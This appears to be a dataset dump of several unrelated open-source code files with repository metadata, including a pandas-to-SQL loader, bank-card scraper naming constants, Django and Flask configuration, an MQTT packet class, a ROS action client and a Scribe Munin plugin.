def __init__(self, df:Union[pd.DataFrame, pd.io.parsers.TextFileReader],
dbTableName:str,
driver:str,
username:str=None,
password:str=None,
address:str=None,
dbName:str=None,
port:Union[int, str]=None,
query:dict={},
dbEcho:bool=True,
if_exists:str='fail',
index:bool=True,
index_label:str=None,
chunksize:int=None,
dtype:dict=None,
):
#private
self._logger = logging.getLogger('DataFrameToDatabase')
self._logger.setLevel(logging.INFO)
#default value updated in self._validateDataFrame
self._isIterable = False
#pd.DataFrame.to_sql variables
self._index = index
self._index_label = index_label
self._chunksize = chunksize
self._dtype = dtype
self._dbTableName = dbTableName
if if_exists not in ['fail', 'append', 'replace']:
raise ValueError('if_exists must be set to "fails", "replace", or "append"')
elif if_exists == 'replace':
self._logger.warning(f'Table "{dbTableName}" will be overwritten.')
self._if_exists = if_exists
#validating and categorizing it as iterable or not
self._logger.info('Validating DataFrame...')
if self._validateDataFrame(df):
self._df = df
self._logger.info('Valid DataFrame')
#validating db params
self._logger.info('Validating database parameters...')
if self._validateDbParameters(driver, username, password, address, port, dbName, query):
#sqlalchemy.create_engine parameters
self._dbEcho = dbEcho
self._driver = driver
self._username = username
self._password = password
self._address = address
self._port = port
self._dbName = dbName
self._query = query
self._logger.info('Valid database parameters')
# self._logger.info('Inserting data...')
# self.insertData()
def _validateDataFrame(self, df):
"""
Validates that the df isn't empty and categorizes it as iterable (TextFileReader) or not iterable (DataFrame)
"""
#if the df is a standard DataFrame
if type(df) == pd.DataFrame:
self._logger.info('Using regular dataframe')
if df.empty:
self._logger.error('Empty dataframe')
raise EmptyDataError('DataFrame is empty')
self.colsAndTypes = {name: df.dtypes[name] for name in list(df.columns)}
self._isIterable = False
#if the df is a large file read in through chunks
elif type(df) == pd.io.parsers.TextFileReader:
self._logger.info('Using large dataframe')
for chunk in df:
self.colsAndTypes = {name: chunk.dtypes[name] for name in list(chunk.columns)}
if chunk.empty:
self._logger.error('Empty dataframe')
raise EmptyDataError('DataFrame is empty')
break
self._isIterable = True
else:
raise TypeError(f'Invalid df type. Type "{type(df)}" is not a DataFrame or TextFileReader')
return True
def _validateDbParameters(self, driver, username, password, address, port, dbName, query):
"""
Validates database parameters by passing it into create_engine. If it succeeds, the parameters are valid
"""
try:
# if driver:
# driver = '+' + driver
# if port:
# port = ':' + str(port)
# if password:
# password = ':' + password
# if address:
# address = '@' + address
dbUrl = sqlalchemy.engine.URL.create(drivername=driver,
username=username,
password=password,
host=address,
port=port,
database=dbName,
query=query)
self._engine = sqlalchemy.create_engine(dbUrl, echo=self._dbEcho)
except Exception as e:
self._logger.exception(e)
raise e
else:
return True
def insertData(self):
"""
Inserts data into the database depending on the type of DataFrame given
"""
if self._isIterable:
#boolean tracking if function DataFrame.to_sql has been run for any chunk
updated = False
for chunk in self._df:
start = time.time()
if not updated:
chunk.to_sql(name=self._dbTableName,
con=self._engine,
if_exists=self._if_exists,
index=self._index,
index_label=self._index_label,
chunksize=self._chunksize,
dtype=self._dtype)
updated = True
elif updated:
chunk.to_sql(name=self._dbTableName,
con=self._engine,
if_exists='append',
index=self._index,
index_label=self._index_label,
chunksize=self._chunksize,
dtype=self._dtype)
end = time.time()
self._logger.info(f'Chunk inserted in {end-start:.3f} seconds')
elif not self._isIterable:
start = time.time()
self._df.to_sql(name=self._dbTableName,
con=self._engine,
if_exists=self._if_exists,
index=self._index,
index_label=self._index_label,
chunksize=self._chunksize,
dtype=self._dtype)
end = time.time()
self._logger.info(f'DataFrame inserted in {end-start:.3f} seconds')
def main(self):
self._logger.info('Inserting data...')
self.insertData()
| [
"jak11772@esri.com"
] | jak11772@esri.com |
96385bf9344820284ad1153cda420ced72c4cb9c | 11b2657afc37beeb1db9dd210ce6485491ce7bfa | /config/config_naming.py | 2d08ed06d85dafaa6cbb973f955bbaa96e429e81 | [] | no_license | lioneltayyd/malaysia-bank-card-scraping | 5299249d10e70b3fc551b62d389e0feb0aea6942 | 5729cd8428d2e21b90a2215ae5c3fd6cf1df82c5 | refs/heads/main | 2023-04-01T00:40:31.035955 | 2021-03-29T15:49:17 | 2021-03-29T15:49:17 | 352,584,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,798 | py | # -------------------------------------------------------
# Variable naming
# -------------------------------------------------------
# General metadata.
DF_URL = 'url'
DF_IMG = 'img'
DF_BANK = 'bank'
# Card metadata.
DF_CARD_NAME_ORIGINAL = 'card_name_original'
DF_CARD_NAME = 'card_name'
DF_CARD_TYPE = 'card_type'
# Card feature.
DF_CARD_FEATURE = 'card_feature_description'
DF_CARD_BENEFIT = 'card_benefit_description'
# Cashback info.
DF_CASHBACK = 'cashback'
DF_CASHBACK_CAT = 'cashback_category'
DF_CASHBACK_INFO = 'cashback_info'
DF_CASHBACK_RATE = 'cashback_rate'
DF_CASHBACK_CAP = 'cashback_cap'
DF_CASHBACK_BENCHMARK = 'cashback_benchmark'
DF_CASHBACK_FROM = 'cashback_from'
DF_CASHBACK_TILL = 'cashback_till'
DF_CASHBACK_WEEKENDS_COND = 'cashback_weekends_only'
DF_CASHBACK_MONTHLY_COND = 'cashback_monthly_basis'
DF_CASHBACK_SINGLE_RECEIPT_COND = 'cashback_single_receipt'
# Reward info.
DF_REWARD = 'reward'
DF_REWARD_CAT = 'reward_category'
DF_REWARD_INFO = 'reward_info'
DF_REWARD_POINTS = 'reward_points'
DF_EACH_SPENDING = 'each_spending'
# Travel benefit.
DF_TRAVEL_BENEFIT = 'travel_benefit'
DF_TRAVEL_BENEFIT_CAT = 'travel_benefit_category'
DF_TRAVEL_BENEFIT_INFO = 'travel_benefit_info'
# Premium info.
DF_PREMIUM = 'premium'
DF_PREMIUM_INFO = 'premium_info'
# Petrol info.
DF_PETROL = 'petrol'
DF_PETROL_INFO = 'petrol_info'
# Requirement.
DF_REQUIRED_INC = 'required_income'
DF_REQUIRED_AGE = 'required_age'
DF_REQUIRED_APPLICANT = 'required_applicant_type'
DF_REQUIRED_INC_RANGE = 'required_income_range'
DF_REQUIRED_MIN_INC = 'required_min_income'
DF_REQUIRED_MAX_INC = 'required_max_income'
DF_REQUIRED_APPLICANT = 'required_applicant'
DF_REQUIRED_AGE = 'required_age'
DF_REQUIRED_MIN_AGE = 'required_min_age'
DF_REQUIRED_MAX_AGE = 'required_max_age'
# Catalogue.
DF_CATALOGUE_CAT = 'catalogue_category'
DF_CATALOGUE_ITEM = 'item_name'
DF_CATALOGUE_CODE = 'item_code'
DF_CATALOGUE_ITEM_FILE = 'item_filename'
DF_CATALOGUE_ITEM_PTS = 'required_points'
DF_CATALOGUE_ITEM_PAR_PTS = 'required_partial_points'
DF_CATALOGUE_TILL_DATE = 'last_until_date'
# Loan metadata.
DF_LOAN_NAME_ORIGINAL = 'loan_name_original'
DF_LOAN_NAME = 'loan_name'
DF_LOAN_TYPE = 'loan_type'
# Loan info.
DF_LOAN_INFO = 'loan_info'
DF_LOAN_RANGE = 'loan_range'
DF_LOAN_MIN_AMT = 'min_loan'
DF_LOAN_MAX_AMT = 'max_loan'
DF_LOAN_MONTH_RANGE = 'month_range'
DF_LOAN_MIN_MONTH = 'min_month'
DF_LOAN_MAX_MONTH = 'max_month'
# Card cost.
DF_COST_CARD_INT_RATE = 'cost_interest_rate_annum'
DF_COST_FEE = 'cost_annual_fee'
DF_COST_FEE_COND = 'cost_annual_fee_condition'
# Penalty cost.
DF_COST_PENALTY = 'cost_late_fee_penalty'
DF_COST_LOAN_INT_RATE = 'annual_int_rate_range'
DF_COST_LOAN_MIN_INT_RATE = 'annual_min_int_rate'
DF_COST_LOAN_MAX_INT_RATE = 'annual_max_int_rate'
| [
"lionel0702@hotmail.com"
] | lionel0702@hotmail.com |
000f8ad08dc25d337b120d65451d68320ad839fc | 69ac37114be839baf66ff9982a5bc2a6c298d7ed | /pajewels/pajewels/urls.py | ea67c62786966acd9cb371f92cfe45e6833a2a10 | [] | no_license | TEENUP/petalArts | d964de176ea5a51d76c03a2e71b7e4a42b3e2aa9 | 2408666612def847a999981cb721c06b9b284b1e | refs/heads/master | 2021-01-01T15:46:35.237631 | 2017-07-19T13:35:57 | 2017-07-19T13:35:57 | 97,697,029 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 924 | py | """pajewels URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^customer/', include('customer.urls')),
url(r'^products/', include('products.urls')),
url(r'^transactions/', include('transactions.urls')),
url(r'^admin/', admin.site.urls),
]
| [
"puneetgupta5294@gmail.com"
] | puneetgupta5294@gmail.com |
73f787908b0cf96a1049464db035b61637d6c025 | 952230594c8062c84f603039091956c25870dda8 | /github_loader/__init__.py | bcf707abecfae5ad9b264bff3c222734e4e5f6c0 | [] | no_license | OrestOhorodnyk/github_loader | db8c076734ddc540798ea76697b6c8f85ec431a7 | 2615a2a33df60de226281d08fcb3ff27e6665d79 | refs/heads/master | 2022-12-13T21:36:58.757300 | 2019-08-21T05:30:19 | 2019-08-21T05:30:19 | 202,147,194 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,051 | py | from datetime import datetime
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import create_engine, MetaData, Column, Table, Integer, DateTime, String, ForeignKey
from flask_login import LoginManager
from github_loader.config import Config, LOG_FILE_PATH
from github_loader.utils.get_logger import make_logger
db = SQLAlchemy()
login_manager = LoginManager()
login_manager.login_view = 'users.login'
login_manager.login_message_category = 'info'
LOGGER = make_logger(LOG_FILE_PATH, 'logger')
def create_app(config_class=Config):
app = Flask(__name__)
app.config.from_object(Config)
db.init_app(app)
login_manager.init_app(app)
from github_loader.users.routes import users
from github_loader.repositories.routes import repositories
from github_loader.main.routes import main
from github_loader.errors.handlers import errors
app.register_blueprint(users)
app.register_blueprint(repositories)
app.register_blueprint(main)
app.register_blueprint(errors)
return app
| [
"o.ohorodnyk@gmail.com"
] | o.ohorodnyk@gmail.com |
9878acf7b00e5caeb7641b7141e912a735fad17d | 1cd75217b75c6400731d35aa9d4525fb416db9ac | /fullyconnect/mqtt/disconnect.py | 7a0cd0783909f3ec9260763441451ce20dadea0f | [
"MIT"
] | permissive | VexingHanson/FullyConnect | 8002fa35665f502165fd530c3aaa83dc318b52a1 | 35e5fc1645d637242f2b7e0ccaf89a4894cbb830 | refs/heads/master | 2023-06-08T11:31:33.302954 | 2019-05-23T14:18:34 | 2019-05-23T14:18:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 752 | py | # Copyright (c) 2015 Nicolas JOUANIN
#
# See the file license.txt for copying permission.
from fullyconnect.mqtt.packet import MQTTPacket, MQTTFixedHeader, DISCONNECT
from fullyconnect.errors import fullyconnectException
class DisconnectPacket(MQTTPacket):
VARIABLE_HEADER = None
PAYLOAD = None
def __init__(self, fixed: MQTTFixedHeader=None):
if fixed is None:
header = MQTTFixedHeader(DISCONNECT, 0x00)
else:
if fixed.packet_type is not DISCONNECT:
raise fullyconnectException("Invalid fixed packet type %s for DisconnectPacket init" % fixed.packet_type)
header = fixed
super().__init__(header)
self.variable_header = None
self.payload = None
| [
"baiyongrui@icloud.com"
] | baiyongrui@icloud.com |
899b00478c14d3e13e226668bc3af9eb98d192cd | 0f5fadb3b735ff8de20f6c068a2cc52a018c5f4b | /Direcciones/migrations/0002_auto__del_field_direccion_IdSepomex__add_field_direccion_IdSepomexid.py | 09abd99a043ae6d91adba6aea509fc2c208ba8f7 | [] | no_license | NoelChaparro/Siobicx | 193c8ed92f905f46f645f5caaa82f0bea31bd608 | 0d655de3ad6d2c7e3f245ff09d4ea25deb706b7d | refs/heads/master | 2021-01-15T23:50:41.930456 | 2014-12-10T20:05:06 | 2014-12-10T20:05:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,185 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Direccion.IdSepomex'
db.delete_column('Direcciones', 'IdSepomex')
# Adding field 'Direccion.IdSepomexid'
db.add_column('Direcciones', 'IdSepomexid',
self.gf('django.db.models.fields.CharField')(max_length=11, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Adding field 'Direccion.IdSepomex'
db.add_column('Direcciones', 'IdSepomex',
self.gf('django.db.models.fields.CharField')(max_length=11, null=True, blank=True),
keep_default=False)
# Deleting field 'Direccion.IdSepomexid'
db.delete_column('Direcciones', 'IdSepomexid')
models = {
u'ConexosAgropecuarios.persona': {
'ApellidoMaterno': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'ApellidoPaterno': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'Curp': ('django.db.models.fields.CharField', [], {'max_length': '18', 'null': 'True', 'blank': 'True'}),
'Email': ('django.db.models.fields.EmailField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'EsSocio': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'EstadoCivil': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'FechaIngreso': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'FechaNacimiento': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'IdPersona': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'Meta': {'ordering': "('Rfc',)", 'object_name': 'Persona', 'db_table': "'Personas'"},
'PrimerNombre': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'RazonSocial': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'Rfc': ('django.db.models.fields.CharField', [], {'max_length': '13'}),
'SegundoNombre': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'Sexo': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
'TipoPersona': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True'})
},
u'Direcciones.direccion': {
'Calle': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'Detalle': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'IdDireccion': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'IdSepomexid': ('django.db.models.fields.CharField', [], {'max_length': '11', 'null': 'True', 'blank': 'True'}),
'Meta': {'ordering': "('Persona',)", 'object_name': 'Direccion', 'db_table': "'Direcciones'"},
'NumeroExterior': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'NumeroInterior': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'Persona': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ConexosAgropecuarios.Persona']"}),
'TipoDireccion': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True'})
},
u'Direcciones.sepomex': {
'CCp': ('django.db.models.fields.CharField', [], {'max_length': '5L', 'db_column': "'CCp'", 'blank': 'True'}),
'CCveCiudad': ('django.db.models.fields.CharField', [], {'max_length': '5L', 'db_column': "'CCveCiudad'", 'blank': 'True'}),
'CEstado': ('django.db.models.fields.CharField', [], {'max_length': '2L', 'db_column': "'CEstado'", 'blank': 'True'}),
'CMnpio': ('django.db.models.fields.CharField', [], {'max_length': '5L', 'db_column': "'CMnpio'", 'blank': 'True'}),
'COficina': ('django.db.models.fields.CharField', [], {'max_length': '5L', 'db_column': "'COficina'", 'blank': 'True'}),
'CTipoAsenta': ('django.db.models.fields.CharField', [], {'max_length': '50L', 'db_column': "'CTipoAsenta'", 'blank': 'True'}),
'DAsenta': ('django.db.models.fields.CharField', [], {'max_length': '200L', 'db_column': "'DAsenta'", 'blank': 'True'}),
'DCiudad': ('django.db.models.fields.CharField', [], {'max_length': '200L', 'db_column': "'DCiudad'", 'blank': 'True'}),
'DCodigo': ('django.db.models.fields.CharField', [], {'max_length': '5L', 'db_column': "'DCodigo'", 'blank': 'True'}),
'DCp': ('django.db.models.fields.CharField', [], {'max_length': '5L', 'db_column': "'DCp'", 'blank': 'True'}),
'DEstado': ('django.db.models.fields.CharField', [], {'max_length': '100L', 'db_column': "'DEstado'", 'blank': 'True'}),
'DMnpio': ('django.db.models.fields.CharField', [], {'max_length': '200L', 'db_column': "'DMnpio'", 'blank': 'True'}),
'DTipoAsenta': ('django.db.models.fields.CharField', [], {'max_length': '100L', 'db_column': "'DTipoAsenta'", 'blank': 'True'}),
'DZona': ('django.db.models.fields.CharField', [], {'max_length': '10L', 'db_column': "'DZona'", 'blank': 'True'}),
'IdAsentaCpCons': ('django.db.models.fields.CharField', [], {'max_length': '10L', 'db_column': "'IdAsentaCpcons'", 'blank': 'True'}),
'IdSepomex': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True', 'db_column': "'IdSepomex'"}),
'Meta': {'object_name': 'Sepomex', 'db_table': "'sepomex'"}
}
}
complete_apps = ['Direcciones'] | [
"sidia.jaquez@gmail.com"
] | sidia.jaquez@gmail.com |
fc3e30dacf683b8c96d1e534d35c1596cbe0aaf7 | d523d06709f9cf8e3542e3ce063db748d9d36581 | /easy_internship_api/centers/tests.py | af4487a5ccda12d801a21c4655c67626a9b77e76 | [] | no_license | msarabi95/easy-internship-api | 5daf3307a24603e3b5f7465aa6c6d40219146e89 | cc715db84d73a0133158da9bc94a5fb7bf6ddacf | refs/heads/master | 2022-12-08T11:06:57.444330 | 2018-06-16T19:30:43 | 2018-06-16T19:30:43 | 136,828,722 | 0 | 0 | null | 2022-11-22T02:30:38 | 2018-06-10T17:10:49 | Python | UTF-8 | Python | false | false | 906 | py | from django.test import TestCase
from model_mommy import mommy
class ModelTests(TestCase):
def test_location_str(self):
location = mommy.make(
'centers.Location',
center=mommy.make('centers.Center'),
specialty=mommy.make('centers.Specialty'),
description=""
)
self.assertEqual(
str(location),
"{} @ {}".format(location.specialty.name, location.center.name),
)
location = mommy.make(
'centers.Location',
center=mommy.make('centers.Center'),
specialty=mommy.make('centers.Specialty'),
)
self.assertEqual(
str(location),
"{} @ {} ({})".format(
location.specialty.name,
location.center.name,
location.description,
),
) | [
"muhammadsaeed_express@yahoo.com"
] | muhammadsaeed_express@yahoo.com |
9b5b03a445f19ee80e1454f2b69ec50d24fc9858 | febeffe6ab6aaa33e3a92e2dbbd75783a4e32606 | /ssseg/cfgs/annnet/cfgs_voc_resnet101os8.py | c5a99a673dced76b76fc8e87509c725ef4b0e15f | [
"MIT"
] | permissive | Junjun2016/sssegmentation | 7bbc5d53abee1e0cc88d5e989e4cff5760ffcd09 | bf7281b369e8d7fc2f8986caaeec3ec38a30c313 | refs/heads/main | 2023-02-04T22:09:13.921774 | 2020-12-23T06:28:56 | 2020-12-23T06:28:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,208 | py | '''define the config file for voc and resnet101os8'''
from .base_cfg import *
# modify dataset config
DATASET_CFG = DATASET_CFG.copy()
DATASET_CFG['train'].update(
{
'type': 'voc',
'set': 'trainaug',
'rootdir': '/data/VOCdevkit/VOC2012',
}
)
DATASET_CFG['test'].update(
{
'type': 'voc',
'rootdir': '/data/VOCdevkit/VOC2012',
}
)
# modify dataloader config
DATALOADER_CFG = DATALOADER_CFG.copy()
# modify optimizer config
OPTIMIZER_CFG = OPTIMIZER_CFG.copy()
OPTIMIZER_CFG.update(
{
'max_epochs': 60,
}
)
# modify losses config
LOSSES_CFG = LOSSES_CFG.copy()
# modify model config
MODEL_CFG = MODEL_CFG.copy()
MODEL_CFG.update(
{
'num_classes': 21,
}
)
# modify common config
COMMON_CFG = COMMON_CFG.copy()
COMMON_CFG['train'].update(
{
'backupdir': 'annnet_resnet101os8_voc_train',
'logfilepath': 'annnet_resnet101os8_voc_train/train.log',
}
)
COMMON_CFG['test'].update(
{
'backupdir': 'annnet_resnet101os8_voc_test',
'logfilepath': 'annnet_resnet101os8_voc_test/test.log',
'resultsavepath': 'annnet_resnet101os8_voc_test/annnet_resnet101os8_voc_results.pkl'
}
) | [
"1159254961@qq.com"
] | 1159254961@qq.com |
e9c36fb34f7bee040f2034bbbfe143b65b8d8e9d | 8eed6883fb4dd352f29b3769b3813c996c39a583 | /locomotor/scripts/send_action.py | 8ac427f252ff5f15100aac0907887ef7967c524b | [] | no_license | mintar/robot_navigation | d1f210520ad5c07bd0fc3c30588c7ff07a88667c | 6daae350d0ec16116fa7ecddf42b036775dc7502 | refs/heads/master | 2021-07-13T04:16:11.356657 | 2020-01-08T08:22:32 | 2020-01-13T10:57:56 | 168,338,280 | 1 | 1 | null | 2020-01-13T10:09:39 | 2019-01-30T12:20:47 | C++ | UTF-8 | Python | false | false | 1,448 | py | #!/usr/bin/python
import rospy
import actionlib
import argparse
from locomotor_msgs.msg import NavigateToPoseAction, NavigateToPoseGoal
def print_feedback(feedback):
pose = feedback.state.global_pose.pose
vel = feedback.state.current_velocity.velocity
print('%.2f %.2f %.2f | %.2f %.2f' % (pose.x, pose.y, pose.theta,
vel.x, vel.theta))
print('Global plan: %d poses' % len(feedback.state.global_plan.poses))
print('%.2f %.2f %.2f' % (feedback.percent_complete,
feedback.distance_traveled,
feedback.estimated_distance_remaining))
parser = argparse.ArgumentParser()
parser.add_argument('x', nargs='?', type=float, default=0.0)
parser.add_argument('y', nargs='?', type=float, default=0.0)
parser.add_argument('theta', nargs='?', type=float, default=0.0)
parser.add_argument('-f', '--frame_id', default='map')
parser.add_argument('-n', '--namespace', default='/locomotor/')
args = parser.parse_args()
rospy.init_node('send_action', anonymous=True)
client = actionlib.SimpleActionClient(args.namespace + '/navigate', NavigateToPoseAction)
client.wait_for_server()
goal = NavigateToPoseGoal()
goal.goal.pose.x = args.x
goal.goal.pose.y = args.y
goal.goal.pose.theta = args.theta
goal.goal.header.frame_id = args.frame_id
client.send_goal(goal, feedback_cb = print_feedback)
client.wait_for_result()
print(client.get_result())
| [
"noreply@github.com"
] | mintar.noreply@github.com |
0d16c13dfc6f18cd12ea859b9915a48ccb9b5c19 | 5710f0e31b34ad655e8239ac24bb947f0c84f71c | /backend/userdb/apps.py | 050efeb6003a4e7eed050eb6161419d5f7762375 | [] | no_license | Mano-Liaoyan/DegreeOverView | 825cba0d82d827256fb08bda71affaad94780004 | d4552b50ec3c113e933d72167534e8415949681d | refs/heads/master | 2023-05-08T15:14:34.856295 | 2021-05-31T14:47:44 | 2021-05-31T14:47:44 | 364,744,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 144 | py | from django.apps import AppConfig
class UserdbConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'userdb'
| [
"467226765@qq.com"
] | 467226765@qq.com |
4e0f8c2121ae38fe6f847d1ee511e07ec78c335b | 6ba4ebba2d2e5774f27b3773986144e807ccbea9 | /scribe_messages | 667059740ddb097c0da9fd62d111441182d9fd5d | [
"Apache-2.0"
] | permissive | yyuu/scribe-munin | e09a5d596de1b111ea6e78c70fdea8792ec25e25 | e3457053c65685fff4188127170ee295bbf3d420 | refs/heads/master | 2021-01-19T07:35:20.782971 | 2011-02-28T05:27:42 | 2011-02-28T05:27:42 | 1,420,271 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,839 | #!/usr/bin/env python
## Copyright (c) 2007-2008 Facebook
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
## See accompanying file LICENSE or visit the Scribe site at:
## http://developers.facebook.com/scribe/
'''scribe_counters: A simple script for running and monitoring scribe.'''
import sys
#make this work for facebook environment too
isFacebook = 0
if (isFacebook == 1):
# put your own path here!
sys.path.insert(0, '/mytrunk/fbcode-test/common/fb303/scripts')
from fb303_scripts import *
from fb303_scripts.fb303_simple_mgmt import *
else:
from fb303_scripts import *
from fb303_scripts.fb303_simple_mgmt import *
# thrift python packages need to be installed
import thrift
from thrift import protocol, transport
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
def get_counters(
port,
trans_factory = None,
prot_factory = None):
"""
get counters from standard fb303 service
@param port: service's port
@param trans_factory: TTransportFactory to use for obtaining a TTransport. Default is
TBufferedTransportFactory
@param prot_factory: TProtocolFactory to use for obtaining a TProtocol. Default is
TBinaryProtocolFactory
"""
counters = fb303_wrapper('counters', port, trans_factory, prot_factory)
return counters
port = os.environ.get('port')
if port is None:
port = 1463
counters = get_counters(port,
trans_factory = TTransport.TFramedTransportFactory(),
prot_factory = TBinaryProtocol.TBinaryProtocolFactory())
categories = set([ key[0:key.index(':')] for key in counters.keys() if not(key.startswith('scribe')) ])
if len(sys.argv) > 1:
if sys.argv[1] == 'autoconfig':
print 'yes'
sys.exit(0)
elif sys.argv[1] == 'config':
print('graph_title Scribe (port %s) messages' % (port))
print('graph_vlabel Messages per ${graph_period}')
print('graph_category Scribe')
print('graph_args --lower-limit 0')
print('graph_period second')
draw = 'AREA'
for category in categories:
print('%s_received_good.label %s:received good' % (category, category))
print('%s_received_good.type DERIVE' % (category))
print('%s_received_good.draw %s' % (category, draw))
print('%s_received_good.min 0' % (category))
draw = 'STACK'
print('scribe_overall_received_good.label scribe_overall:received good')
print('scribe_overall_received_good.type DERIVE')
print('scribe_overall_received_good.draw LINE2')
print('scribe_overall_received_good.min 0')
print('scribe_overall_sent.label scribe_overall:sent')
print('scribe_overall_sent.type DERIVE')
print('scribe_overall_sent.draw LINE2')
print('scribe_overall_sent.min 0')
sys.exit(0)
for category in categories:
print('%s_received_good.value %d' % (category, counters.get(category + ':received good', 0)))
print('scribe_overall_received_good.value %d' % (counters.get('scribe_overall:received good', 0)))
print('scribe_overall_sent.value %d' % (counters.get('scribe_overall:sent', 0)))
# vim:set ft=python :
| [
"yamashita@geishatokyo.com"
] | yamashita@geishatokyo.com | |
8002b8bd33ebd7c6508328204e0bcaba4abfe848 | c527df31f9daf06c36e8025b372d137ad9c1c4c7 | /django/call_app/admin.py | e2561d3e10d41c1a4aa4e22c0d7feb735b07ee77 | [] | no_license | Katerina964/callback | 8dc7d5d230d095ec32ce1d69c4648f4564e99f87 | 741fa58779413845ccc4e478ccc2b952c6d000a0 | refs/heads/master | 2023-03-30T17:55:08.611493 | 2021-04-13T08:53:30 | 2021-04-13T08:53:30 | 295,951,947 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 169 | py | from django.contrib import admin
from .models import Crmaccount, Call, Customer
admin.site.register(Crmaccount)
admin.site.register(Call)
admin.site.register(Customer)
| [
"katrin.balakina@gmail.com"
] | katrin.balakina@gmail.com |
383cc4ca9311b639efa851ec502c10424169145d | e10bba262b4e8732c63ec5712124a2397f63b5f0 | /A+B.py | af1abd60d66e21182493de8ce44907fe0bcd4f2c | [] | no_license | forybh/Algorithm_py | d0d510b7dd05567838e2760de0a2e6c051d0622a | b8beba29168f0b9a88f796fa81a3679d519f007d | refs/heads/master | 2023-08-28T20:37:05.744119 | 2021-10-23T13:30:59 | 2021-10-23T13:30:59 | 326,145,951 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 159 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jan 3 14:45:18 2021
@author: yubyeongheon
"""
a,b = input().split()
print(int(a) + int(b)) | [
"forybh@naver.com"
] | forybh@naver.com |
7c911c573a204e4f1e15be81356f04ef1d607eb7 | 4148a916ff94ac6340330852c5876f5fb4b35c60 | /OOPS/method.py | 4a5dcea685576b90d9e2bc99e7cadba0bdb6e9ea | [] | no_license | AneelaSarikonda/PYTHON | 34e38f3fd0c4b33eb9a2eed326d4c3c30a889136 | 41fbc1dff067654b6f55601665a252bf1908e573 | refs/heads/master | 2020-09-14T13:50:06.537709 | 2019-12-17T06:08:59 | 2019-12-17T06:08:59 | 223,146,451 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 209 | py | class Student:
def __init__(var,m1,m2,m3):
var.m1=m1
var.m2=m2
var.m3=m3
def avg(s):
return (s.m1 + s.m2 + s.m3)/3
s1=Student(36,57,89)
s2=Student(46,60,27)
print(s1.avg())
print(s2.avg())
| [
"mounika1.g@gmail.com"
] | mounika1.g@gmail.com |
67afcb30651bb27c0ab62380ab348197fbbba69b | a634e3dab7e3447b7a0269f42a55392c4f3fecb9 | /app/main/urls.py | a364e5c62daca16a97ddcfae4a5c0ca9d7187e32 | [
"MIT"
] | permissive | FedeRez/webldap | cbd97f876453c31d7d67331c9feaba6ec16700ba | 175ad1443e46229edcd6483bb924917301f99333 | refs/heads/master | 2021-01-17T09:05:19.429831 | 2016-03-28T10:54:19 | 2016-03-28T10:54:19 | 9,249,058 | 13 | 4 | null | 2016-04-29T20:33:08 | 2013-04-05T19:38:25 | Python | UTF-8 | Python | false | false | 1,040 | py | from django.conf.urls import patterns, url
urlpatterns = patterns(
'main.views',
url(r'^$', 'profile'),
url(r'^edit/$', 'profile_edit'),
url(r'^login/$', 'login'),
